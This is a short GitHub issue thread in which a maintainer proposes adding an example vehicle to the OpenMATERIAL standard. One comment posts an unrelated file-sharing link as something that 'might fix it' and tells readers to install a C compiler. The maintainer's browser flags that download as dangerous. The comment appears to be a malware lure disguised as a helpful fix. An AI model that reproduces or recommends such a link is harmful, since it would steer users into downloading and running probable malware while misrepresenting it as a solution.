### ISSUE TITLE
Add example vehicle to demonstrate vehicle node structure

### ISSUE THREAD

**Issue by ClemensLinnhoff** [asam-ev/OpenMATERIAL#111]
**Is your feature request related to a problem? Please describe.**
Having a concrete example to showcase the standard definition is always helpful.

**Describe the solution you'd like**
Modify the existing example vehicle from the legacy OpenMATERIAL to reflect the current standard description.

**Comment by achilles0x** [comment]
This might help:This file might fix it
https://mega.co.nz/#!9vE0jIrD!nkSuAAbrT1Sjn01VjaQfVQGAFLqvdIF4EkMeSLuKCWw
If you don't have the c compliator, install it.(gcc or clang)

**Comment by ClemensLinnhoff** [comment]
> This might help:This file might fix it https://mega.co.nz/#!9vE0jIrD!nkSuAAbrT1Sjn01VjaQfVQGAFLqvdIF4EkMeSLuKCWw If you don't have the c compliator, install it.(gcc or clang)

What is this? My browser flags it as dangerous and does not let me download the zip.
